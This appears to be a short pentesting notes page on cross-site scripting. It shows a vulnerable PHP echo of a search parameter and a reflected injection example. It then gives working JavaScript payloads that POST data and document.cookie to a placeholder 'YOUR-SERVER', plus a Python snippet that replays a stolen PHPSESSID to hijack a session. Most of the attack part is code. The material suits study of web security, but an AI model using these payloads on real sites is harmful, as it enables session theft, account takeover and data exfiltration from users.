XSS
Cross-Site Scripting (XSS)
<?php
echo '<div><p>Searched string: ' . $_GET['search'] . '</p></div>';
?>
http(s)://HOST/file.php?search=1<div><p>Searched string: 1</p></div>
http(s)://HOST/file.php?search=</p><script>alert()</script><p><div><p>Searched string: </p><script>alert()</script><p></p></div>
As you can see, the injected code gets inserted into the HTML response of the website.
</p> -> Closing current tag.
<script> -> Opening javascript tag.
alert() -> Function to pop an alert box.
</script> -> Closing javascript tag.
<p> -> Reopening p tag for the response not to mess up.In this injection, the code gets stored into a database (e.g. as a comment, name, description, etc) and then gets reflected when it is displayed.
To exfiltrate data, a receiving server would be needed, like a HTPP server.
NGROK's substitute for tunXs and python's SimpleHTTPSever/http.server
<html>
<script>
first = new XMLHttpRequest();
first.open("POST", "YOUR-SERVER");
first.send("EXFILTRATED-DATA");
</script>
</html>
<html>
<script>
first = new XMLHttpRequest();
first.open("GET", "TARGET-SERVER");
first.onreadystatechange = function () {
if (first.readyState === XMLHttpRequest.DONE) {
second = new XMLHttpRequest();
second.open("POST", "YOUR-SERVER");
second.send("EXFILTRATED-DATA");
}
}
first.send();
</script>
</html>
In a nuthshell, stealing the (administrator|authenticated user) sesion cookie's value and using it.
<html>
<script>
first = new XMLHttpRequest();
first.open("POST", "YOUR-SERVER");
first.send(document.cookie);
</script>
</html>
import requests
url = ""
exfiltrated_cookie = ""
cookies = {'PHPSESSID': f"{exfiltrated_cookie}"} # Example
r = requests.get(url, cookies=cookies)
Last modified 2yr ago